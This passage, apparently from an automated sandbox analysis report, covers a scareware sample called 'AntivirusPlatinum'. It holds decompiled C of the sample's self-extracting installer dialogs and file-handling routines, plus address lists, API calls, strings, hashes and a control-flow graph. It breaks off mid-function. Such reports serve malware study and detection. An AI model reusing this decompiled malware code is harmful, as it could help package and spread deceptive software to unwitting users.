                                                                                                                                                  								}
                                                                                                                                                  								_t158 = E00405074(0,  &_v5744);
                                                                                                                                                  								goto L36;
                                                                                                                                                  							}
                                                                                                                                                  							_t204 = GetLastError();
                                                                                                                                                  							__eflags = _t204 - 5;
                                                                                                                                                  							if(_t204 == 5) {
                                                                                                                                                  								L24:
                                                                                                                                                  								_a11 = 1;
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t204 - 3;
                                                                                                                                                  							if(_t204 != 3) {
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							goto L24;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *0x419f78 = 2;
                                                                                                                                                  							_t233 = 1;
                                                                                                                                                  							L51:
                                                                                                                                                  							__eflags =  *0x419f74; // 0x0
                                                                                                                                                  							if(__eflags <= 0) {
                                                                                                                                                  								goto L82;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f78; // 0x2
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								goto L82;
                                                                                                                                                  							}
                                                                                                                                                  							 *0x419f70 = _t233;
                                                                                                                                                  							SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                  							_t171 =  *0x414c7c; // 0x0
                                                                                                                                                  							__eflags = _t171 - 9;
                                                                                                                                                  							if(_t171 != 9) {
                                                                                                                                                  								__eflags = _t171 - 3;
                                                                                                                                                  								_t222 = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                  								__eflags = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t54 = _t171 + 0x7a; // 0x7a
                                                                                                                                                  								_t222 = _t54;
                                                                                                                                                  							}
                                                                                                                                                  							_t172 = E004098F7(0x7e);
                                                                                                                                                  							MessageBoxA(_t242, E004098F7(_t222), _t172, 0x30);
                                                                                                                                                  							goto L96;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags =  *0x419f68; // 0x0
                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                  							 *0x419f78 = 2;
                                                                                                                                                  						}
                                                                                                                                                  						_push(1);
                                                                                                                                                  						L16:
                                                                                                                                                  						EndDialog(_t242, ??);
                                                                                                                                                  						L8:
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t210 = _t149 - 1;
                                                                                                                                                  				if(_t210 == 0) {
                                                                                                                                                  					__eflags =  *0x419f6c; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						L11:
                                                                                                                                                  						 *0x419f78 = 2;
                                                                                                                                                  						_push(0);
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  					 *0x419f78 = 1;
                                                                                                                                                  					__eflags =  *0x419f74; // 0x0
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						goto L8;
                                                                                                                                                  					}
                                                                                                                                                  					goto L11;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t210 == 0x64) {
                                                                                                                                                  					_t214 = E004027D8(_t242, E004098F7(0x64),  &_v1104);
                                                                                                                                                  					__eflags = _t214;
                                                                                                                                                  					if(_t214 != 0) {
                                                                                                                                                  						SetDlgItemTextA(_t242, 0x65,  &_v1104);
                                                                                                                                                  					}
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				goto L5;
                                                                                                                                                  			}















































                                                                                                                                                  0x0040cc24
                                                                                                                                                  0x0040cc24
                                                                                                                                                  0x0040cc2c
                                                                                                                                                  0x0040cc33
                                                                                                                                                  0x0040cc4a
                                                                                                                                                  0x0040cc52
                                                                                                                                                  0x0040cc57
                                                                                                                                                  0x0040d04f
                                                                                                                                                  0x0040d054
                                                                                                                                                  0x0040d05a
                                                                                                                                                  0x0040d060
                                                                                                                                                  0x0040d062
                                                                                                                                                  0x0040d06d
                                                                                                                                                  0x0040d06d
                                                                                                                                                  0x0040d073
                                                                                                                                                  0x0040d078
                                                                                                                                                  0x0040d07a
                                                                                                                                                  0x0040d086
                                                                                                                                                  0x0040d086
                                                                                                                                                  0x0040d08d
                                                                                                                                                  0x0040d09b
                                                                                                                                                  0x0040d0a5
                                                                                                                                                  0x0040d0b3
                                                                                                                                                  0x0040d0b9
                                                                                                                                                  0x0040d0c3
                                                                                                                                                  0x0040d0f5
                                                                                                                                                  0x0040d0fb
                                                                                                                                                  0x0040d0fe
                                                                                                                                                  0x0040d100
                                                                                                                                                  0x0040d10b
                                                                                                                                                  0x0040d11b
                                                                                                                                                  0x0040d124
                                                                                                                                                  0x0040d12f
                                                                                                                                                  0x0040d132
                                                                                                                                                  0x0040d138
                                                                                                                                                  0x0040d13a
                                                                                                                                                  0x0040d141
                                                                                                                                                  0x0040d141
                                                                                                                                                  0x0040d153
                                                                                                                                                  0x0040d102
                                                                                                                                                  0x0040d107
                                                                                                                                                  0x0040d107
                                                                                                                                                  0x0040d165
                                                                                                                                                  0x0040d174
                                                                                                                                                  0x0040d177
                                                                                                                                                  0x0040d17c
                                                                                                                                                  0x0040d182
                                                                                                                                                  0x0040d184
                                                                                                                                                  0x0040d184
                                                                                                                                                  0x0040d18e
                                                                                                                                                  0x0040d197
                                                                                                                                                  0x0040d1b0
                                                                                                                                                  0x0040d1b6
                                                                                                                                                  0x0040d1bb
                                                                                                                                                  0x0040d1c1
                                                                                                                                                  0x0040d1cc
                                                                                                                                                  0x0040d1cc
                                                                                                                                                  0x0040d1d1
                                                                                                                                                  0x0040d1d7
                                                                                                                                                  0x0040d234
                                                                                                                                                  0x0040d234
                                                                                                                                                  0x0040d23a
                                                                                                                                                  0x0040d2c2
                                                                                                                                                  0x0040d2c2
                                                                                                                                                  0x0040d2c3
                                                                                                                                                  0x0040d2c3
                                                                                                                                                  0x0040d2ca
                                                                                                                                                  0x0040d2d0
                                                                                                                                                  0x0040d2d0
                                                                                                                                                  0x0040d2d6
                                                                                                                                                  0x0040d2dc
                                                                                                                                                  0x0040d2e2
                                                                                                                                                  0x0040d2eb
                                                                                                                                                  0x0040d2eb
                                                                                                                                                  0x0040d2f0
                                                                                                                                                  0x0040d2f5
                                                                                                                                                  0x0040d2f7
                                                                                                                                                  0x0040d2f9
                                                                                                                                                  0x0040d2ff
                                                                                                                                                  0x0040d301
                                                                                                                                                  0x0040d302
                                                                                                                                                  0x0040d303
                                                                                                                                                  0x0040d308
                                                                                                                                                  0x0040d309
                                                                                                                                                  0x0040d30b
                                                                                                                                                  0x0040d315
                                                                                                                                                  0x0040d30d
                                                                                                                                                  0x0040d30d
                                                                                                                                                  0x0040d30d
                                                                                                                                                  0x0040d30b
                                                                                                                                                  0x0040d2ff
                                                                                                                                                  0x0040d31b
                                                                                                                                                  0x0040d321
                                                                                                                                                  0x0040d32d
                                                                                                                                                  0x0040d32d
                                                                                                                                                  0x0040d333
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d333
                                                                                                                                                  0x0040d248
                                                                                                                                                  0x0040d24d
                                                                                                                                                  0x0040d252
                                                                                                                                                  0x0040d254
                                                                                                                                                  0x0040d256
                                                                                                                                                  0x0040d25c
                                                                                                                                                  0x0040d25e
                                                                                                                                                  0x0040d26e
                                                                                                                                                  0x0040d279
                                                                                                                                                  0x0040d279
                                                                                                                                                  0x0040d25c
                                                                                                                                                  0x0040d280
                                                                                                                                                  0x0040d281
                                                                                                                                                  0x0040d287
                                                                                                                                                  0x0040d2b1
                                                                                                                                                  0x0040d2b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d289
                                                                                                                                                  0x0040d29b
                                                                                                                                                  0x0040d2a1
                                                                                                                                                  0x0040d2a3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d2a5
                                                                                                                                                  0x0040d2ab
                                                                                                                                                  0x0040d2ab
                                                                                                                                                  0x0040cf41
                                                                                                                                                  0x0040cf42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cf42
                                                                                                                                                  0x0040d1d9
                                                                                                                                                  0x0040d1d9
                                                                                                                                                  0x0040d1df
                                                                                                                                                  0x0040d1e4
                                                                                                                                                  0x0040d1f0
                                                                                                                                                  0x0040d203
                                                                                                                                                  0x0040d208
                                                                                                                                                  0x0040d209
                                                                                                                                                  0x0040d209
                                                                                                                                                  0x0040d211
                                                                                                                                                  0x0040d217
                                                                                                                                                  0x0040d219
                                                                                                                                                  0x0040d22f
                                                                                                                                                  0x0040d22f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d217
                                                                                                                                                  0x0040d1d7
                                                                                                                                                  0x0040cc5e
                                                                                                                                                  0x0040cc6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc6f
                                                                                                                                                  0x0040cc64
                                                                                                                                                  0x0040cc65
                                                                                                                                                  0x0040ccdd
                                                                                                                                                  0x0040cce3
                                                                                                                                                  0x0040cce9
                                                                                                                                                  0x0040cd08
                                                                                                                                                  0x0040cd0e
                                                                                                                                                  0x0040cd25
                                                                                                                                                  0x0040cd2b
                                                                                                                                                  0x0040cd2e
                                                                                                                                                  0x0040cd34
                                                                                                                                                  0x0040cd45
                                                                                                                                                  0x0040cd55
                                                                                                                                                  0x0040cd55
                                                                                                                                                  0x0040cd5a
                                                                                                                                                  0x0040cd69
                                                                                                                                                  0x0040cd6c
                                                                                                                                                  0x0040cd77
                                                                                                                                                  0x0040cd79
                                                                                                                                                  0x0040cd8b
                                                                                                                                                  0x0040cd92
                                                                                                                                                  0x0040cd98
                                                                                                                                                  0x0040cd9a
                                                                                                                                                  0x0040cd9e
                                                                                                                                                  0x0040cda1
                                                                                                                                                  0x0040cda3
                                                                                                                                                  0x0040cda5
                                                                                                                                                  0x0040cda8
                                                                                                                                                  0x0040cdaa
                                                                                                                                                  0x0040cdaa
                                                                                                                                                  0x0040cda8
                                                                                                                                                  0x0040cdae
                                                                                                                                                  0x0040cdb3
                                                                                                                                                  0x0040cdb5
                                                                                                                                                  0x0040ce25
                                                                                                                                                  0x0040ce27
                                                                                                                                                  0x0040ce27
                                                                                                                                                  0x0040ce28
                                                                                                                                                  0x0040ce28
                                                                                                                                                  0x0040ce2b
                                                                                                                                                  0x0040cf54
                                                                                                                                                  0x0040cf5d
                                                                                                                                                  0x0040cf63
                                                                                                                                                  0x0040cf6c
                                                                                                                                                  0x0040cf74
                                                                                                                                                  0x0040cf82
                                                                                                                                                  0x0040cf90
                                                                                                                                                  0x0040cf9f
                                                                                                                                                  0x0040cfad
                                                                                                                                                  0x0040cfb2
                                                                                                                                                  0x0040cfb8
                                                                                                                                                  0x0040cfba
                                                                                                                                                  0x0040cfc0
                                                                                                                                                  0x0040cfc2
                                                                                                                                                  0x0040cfc8
                                                                                                                                                  0x0040cfd3
                                                                                                                                                  0x0040cfd3
                                                                                                                                                  0x0040cfc8
                                                                                                                                                  0x0040cfc0
                                                                                                                                                  0x0040cfdb
                                                                                                                                                  0x0040cfe0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cfe0
                                                                                                                                                  0x0040ce31
                                                                                                                                                  0x0040ce37
                                                                                                                                                  0x0040ce39
                                                                                                                                                  0x0040ce39
                                                                                                                                                  0x0040ce41
                                                                                                                                                  0x0040ce41
                                                                                                                                                  0x0040ce47
                                                                                                                                                  0x0040ce49
                                                                                                                                                  0x0040cef0
                                                                                                                                                  0x0040cf0e
                                                                                                                                                  0x0040cf1d
                                                                                                                                                  0x0040cf34
                                                                                                                                                  0x0040cf3a
                                                                                                                                                  0x0040cf3a
                                                                                                                                                  0x0040cf40
                                                                                                                                                  0x0040cf40
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cf40
                                                                                                                                                  0x0040ce5c
                                                                                                                                                  0x0040ce7f
                                                                                                                                                  0x0040ce8b
                                                                                                                                                  0x0040ce94
                                                                                                                                                  0x0040ce97
                                                                                                                                                  0x0040ce9e
                                                                                                                                                  0x0040cea5
                                                                                                                                                  0x0040ceac
                                                                                                                                                  0x0040ceaf
                                                                                                                                                  0x0040ceb6
                                                                                                                                                  0x0040cebd
                                                                                                                                                  0x0040cec0
                                                                                                                                                  0x0040cec3
                                                                                                                                                  0x0040cec9
                                                                                                                                                  0x0040cecb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ced5
                                                                                                                                                  0x0040cee0
                                                                                                                                                  0x0040cee9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cee9
                                                                                                                                                  0x0040cdb7
                                                                                                                                                  0x0040cdbd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cdbf
                                                                                                                                                  0x0040cdc2
                                                                                                                                                  0x0040ce40
                                                                                                                                                  0x0040ce40
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ce40
                                                                                                                                                  0x0040cdd7
                                                                                                                                                  0x0040cddd
                                                                                                                                                  0x0040cde6
                                                                                                                                                  0x0040cded
                                                                                                                                                  0x0040cdfd
                                                                                                                                                  0x0040ce02
                                                                                                                                                  0x0040ce05
                                                                                                                                                  0x0040ce07
                                                                                                                                                  0x0040ce09
                                                                                                                                                  0x0040ce0f
                                                                                                                                                  0x0040ce12
                                                                                                                                                  0x0040ce14
                                                                                                                                                  0x0040ce14
                                                                                                                                                  0x0040ce12
                                                                                                                                                  0x0040ce1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ce1e
                                                                                                                                                  0x0040cd7b
                                                                                                                                                  0x0040cd7d
                                                                                                                                                  0x0040cd80
                                                                                                                                                  0x0040cd87
                                                                                                                                                  0x0040cd87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cd87
                                                                                                                                                  0x0040cd82
                                                                                                                                                  0x0040cd85
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cd10
                                                                                                                                                  0x0040cd12
                                                                                                                                                  0x0040cd1c
                                                                                                                                                  0x0040cfe6
                                                                                                                                                  0x0040cfe6
                                                                                                                                                  0x0040cfec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cff2
                                                                                                                                                  0x0040cff8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d000
                                                                                                                                                  0x0040d00e
                                                                                                                                                  0x0040d014
                                                                                                                                                  0x0040d019
                                                                                                                                                  0x0040d01c
                                                                                                                                                  0x0040d025
                                                                                                                                                  0x0040d02f
                                                                                                                                                  0x0040d02f
                                                                                                                                                  0x0040d01e
                                                                                                                                                  0x0040d01e
                                                                                                                                                  0x0040d01e
                                                                                                                                                  0x0040d01e
                                                                                                                                                  0x0040d036
                                                                                                                                                  0x0040d044
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d044
                                                                                                                                                  0x0040cceb
                                                                                                                                                  0x0040cceb
                                                                                                                                                  0x0040ccf1
                                                                                                                                                  0x0040ccf3
                                                                                                                                                  0x0040ccf3
                                                                                                                                                  0x0040ccfd
                                                                                                                                                  0x0040ccff
                                                                                                                                                  0x0040cd00
                                                                                                                                                  0x0040cc9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cca1
                                                                                                                                                  0x0040cce9
                                                                                                                                                  0x0040cc67
                                                                                                                                                  0x0040cc68
                                                                                                                                                  0x0040cca7
                                                                                                                                                  0x0040ccad
                                                                                                                                                  0x0040ccc1
                                                                                                                                                  0x0040ccc1
                                                                                                                                                  0x0040cccb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cccb
                                                                                                                                                  0x0040ccaf
                                                                                                                                                  0x0040ccb9
                                                                                                                                                  0x0040ccbf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ccbf
                                                                                                                                                  0x0040cc6d
                                                                                                                                                  0x0040cc86
                                                                                                                                                  0x0040cc8b
                                                                                                                                                  0x0040cc8d
                                                                                                                                                  0x0040cc99
                                                                                                                                                  0x0040cc99
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc8d
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040CC99
                                                                                                                                                  • GetDlgItemTextA.USER32 ref: 0040CCDD
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040CD00
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040CD25
                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CD45
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,0041259A), ref: 0040CD55
                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CD5A
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000), ref: 0040CD7B
                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00000000), ref: 0040CD92
                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 0040CDA3
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040CDC4
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CDD7
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000001), ref: 0040CE09
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?), ref: 0040CE5C
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CE7F
                                                                                                                                                  • ShellExecuteExA.SHELL32 ref: 0040CEC3
                                                                                                                                                  • WaitForInputIdle.USER32 ref: 0040CED5
                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040CEE0
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CF0E
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040CF34
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040CF42
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040D00E
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040D044
                                                                                                                                                  • SendMessageA.USER32(?,00000080,00000001,00170247), ref: 0040D06D
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000069,00000172,00000000,5D050A36), ref: 0040D086
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040D095
                                                                                                                                                  • GetWindowRect.USER32 ref: 0040D0A5
                                                                                                                                                  • MapWindowPoints.USER32 ref: 0040D0B3
                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040D0C3
                                                                                                                                                  • CreateWindowExA.USER32 ref: 0040D0F5
                                                                                                                                                  • SetMenu.USER32(?,00000067), ref: 0040D107
                                                                                                                                                  • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000203), ref: 0040D11B
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040D124
                                                                                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040D132
                                                                                                                                                  • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 0040D141
                                                                                                                                                  • SendMessageA.USER32(?,00000435,00000000,00400000), ref: 0040D153
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?), ref: 0040D165
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040D16E
                                                                                                                                                  • SetWindowTextA.USER32(?,00419F92), ref: 0040D18E
                                                                                                                                                  • DialogBoxParamA.USER32 ref: 0040D29B
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040D2D0
                                                                                                                                                  • SendMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D30D
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040D32D
                                                                                                                                                    • Part of subcall function 0040BF99: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                  • PostMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D315
                                                                                                                                                    • Part of subcall function 00406D54: OleInitialize.OLE32(00000000), ref: 00406D67
                                                                                                                                                    • Part of subcall function 00406D54: #17.COMCTL32 ref: 00406D6D
                                                                                                                                                    • Part of subcall function 00406D54: ShowWindow.USER32(?,00000000,?,?), ref: 00406D86
                                                                                                                                                    • Part of subcall function 00406D54: GetWindowRect.USER32 ref: 00406D9F
                                                                                                                                                    • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DB4
                                                                                                                                                    • Part of subcall function 00406D54: MapWindowPoints.USER32 ref: 00406DB9
                                                                                                                                                    • Part of subcall function 00406D54: DestroyWindow.USER32(?), ref: 00406DC7
                                                                                                                                                    • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DD5
                                                                                                                                                    • Part of subcall function 00406D54: CreateWindowExA.USER32 ref: 00406DFD
                                                                                                                                                    • Part of subcall function 00406D54: ShowWindow.USER32(00000000,00000005), ref: 00406E0D
                                                                                                                                                    • Part of subcall function 00406D54: UpdateWindow.USER32(?), ref: 00406E12
                                                                                                                                                    • Part of subcall function 0040A205: GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                    • Part of subcall function 0040A205: RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Message$ItemSend$Text$ErrorLastwsprintf$CallbackCreateCurrentDestroyDialogDirectoryDispatcherHeapMenuParentPointsRectShowUser$CountExecuteFileFocusFreeIdleInitializeInputModuleNameParamPostProcessShellSleepTickUpdateWaitlstrcmpi
                                                                                                                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$@#A$@Mhv$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$LICENSEDLG$P'A$RichEdit$STARTDLG$__tmp_rar_sfx_access_check_%u$|LA
                                                                                                                                                  • API String ID: 3736303233-1737590172
                                                                                                                                                  • Opcode ID: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                  • Instruction ID: f2e0a792357f86b342ab9803b758d3748dbde46f84287d89c15ad3aa3ed67d42
                                                                                                                                                  • Opcode Fuzzy Hash: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                  • Instruction Fuzzy Hash: B3128FB1941209BEDB11AFA0DD85EEE3A6CEB05304F00817AF605F61E1C7B84D56DB6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 173 40bf99-40bfaa call 401200 176 40bfb0-40bfd9 call 40b613 173->176 177 40ca5b-40ca5c 173->177 180 40ca5a 176->180 181 40bfdf-40bfe0 176->181 180->177 182 40bfe1-40c001 181->182 183 40c008-40c01b call 40a925 182->183 186 40c01d 183->186 187 40c021-40c03a lstrcmpiA 186->187 188 40c04a-40c04e 187->188 189 40c03c-40c043 187->189 191 40c054-40c057 188->191 192 40ca2a-40ca52 call 40b613 188->192 189->187 190 40c045 189->190 190->192 193 40c313-40c317 191->193 194 40c2f4-40c2f8 191->194 195 40c266-40c26a 191->195 196 40c05e-40c062 191->196 192->182 203 40ca58-40ca59 192->203 193->192 202 40c31d-40c324 193->202 194->192 201 40c2fe-40c30e SetWindowTextA 194->201 195->192 199 40c270-40c27c 195->199 196->192 200 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 196->200 204 40c289-40c28d 199->204 205 40c27e-40c284 call 40a5e2 199->205 278 40c0f0 200->278 279 40c256-40c261 call 405bca 200->279 201->192 202->192 207 40c32a-40c33e 202->207 203->180 209 40c297-40c29f call 40b7ba 204->209 210 40c28f-40c295 204->210 205->204 212 40c340 207->212 213 40c346-40c351 call 40a384 207->213 215 40c2a1-40c2a3 209->215 210->215 212->213 213->192 223 40c357-40c35b 213->223 220 40c2a5-40c2a7 215->220 221 40c2a9-40c2b4 call 40a384 215->221 224 40c2b6-40c2d3 call 40a384 call 40a224 220->224 221->224 228 40c361-40c365 223->228 229 40c408-40c40a 223->229 247 40c2d5 224->247 248 40c2d8-40c2e3 call 40a5e2 224->248 228->229 234 40c36b 228->234 235 40c410-40c412 229->235 236 40c36e-40c376 call 40a477 229->236 234->236 239 40c414-40c418 235->239 240 40c41e-40c438 RegOpenKeyExA 235->240 244 40c37b-40c38b call 40a3d9 236->244 239->236 239->240 245 40c469-40c470 240->245 246 40c43a-40c463 RegQueryValueExA RegCloseKey 240->246 261 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 244->261 262 40c38d-40c391 244->262 251 40c472-40c489 call 40a384 245->251 252 40c49c-40c4b8 call 40a384 * 2 245->252 246->245 247->248 248->192 265 40c2e9-40c2ef call 40a205 248->265 251->252 269 40c48b-40c497 call 40a5e2 251->269 252->244 276 40c4be-40c4cb call 40a5e2 252->276 291 40c3e6-40c3e8 261->291 262->261 267 40c393 262->267 265->192 267->261 269->252 276->192 276->244 282 40c0f5-40c10b SetFileAttributesA 278->282 279->192 286 40c111-40c119 call 406ea5 282->286 287 40c1bb-40c1c7 GetFileAttributesA 282->287 286->287 299 40c11f-40c150 call 407300 call 4076c8 call 40a384 286->299 289 40c1c9-40c1d8 DeleteFileA 287->289 290 40c23a-40c250 call 405fad 287->290 289->290 293 40c1da-40c1de 289->293 290->279 290->282 291->192 294 40c3ee-40c403 SendMessageA 291->294 297 40c1e6-40c206 wsprintfA GetFileAttributesA 293->297 294->192 300 40c1e0-40c1e3 297->300 301 40c208-40c21e MoveFileA 297->301 312 40c152-40c161 call 40a384 299->312 313 40c163-40c173 call 407279 299->313 300->297 301->290 304 40c220-40c227 call 406ea5 301->304 304->290 310 40c229-40c234 MoveFileExA 304->310 310->290 312->313 318 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 312->318 313->279 313->318 318->287
                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E0040BF99(void* __edx, void* __esi, signed int _a1, struct HWND__* _a4, char _a8, char _a11, signed int _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v9;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				int _v24;
                                                                                                                                                  				struct _SHFILEOPSTRUCTA _v56;
                                                                                                                                                  				char _v568;
                                                                                                                                                  				char _v1080;
                                                                                                                                                  				char _v2103;
                                                                                                                                                  				char _v2104;
                                                                                                                                                  				char _v3127;
                                                                                                                                                  				char _v3128;
                                                                                                                                                  				char _v5176;
                                                                                                                                                  				char _v7223;
                                                                                                                                                  				char _v7224;
                                                                                                                                                  				void* _v8248;
                                                                                                                                                  				char _v9416;
                                                                                                                                                  				char _v12504;
                                                                                                                                                  				void _v13528;
                                                                                                                                                  				char _v16608;
                                                                                                                                                  				char _v17632;
                                                                                                                                                  				char _v21728;
                                                                                                                                                  				char _v25824;
                                                                                                                                                  				char _v29920;
                                                                                                                                                  				void* _v34016;
                                                                                                                                                  				char _v38112;
                                                                                                                                                  				char _v42207;
                                                                                                                                                  				char _v42208;
                                                                                                                                                  				char _v46304;
                                                                                                                                                  				signed int __edi;
                                                                                                                                                  				void* _t235;
                                                                                                                                                  				char _t240;
                                                                                                                                                  				void* _t316;
                                                                                                                                                  				void* _t323;
                                                                                                                                                  
                                                                                                                                                  				_t316 = __edx;
                                                                                                                                                  				_t235 = E00401200(0xb4dc);
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					return _t235;
                                                                                                                                                  				}
                                                                                                                                                  				_t240 = E0040B613(0x1000, __esi, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11); // executed
                                                                                                                                                  				_a8 = _t240;
                                                                                                                                                  				if(_t240 == 0) {
                                                                                                                                                  					L157:
                                                                                                                                                  					return _t240;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(__esi);
                                                                                                                                                  					do {
                                                                                                                                                  						_t323 = GetFileAttributesA;
                                                                                                                                                  						_v8 =  &_v46304;
                                                                                                                                                  						_v16 = 6;
                                                                                                                                                  						goto L4;
                                                                                                                                                  						L6:
                                                                                                                                                  						while(lstrcmpiA( &_v21728,  *(0x4140b8 + _v8 * 4)) != 0) {
                                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                                  							if(_v8 < 0xd) {
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L155;
                                                                                                                                                  							}
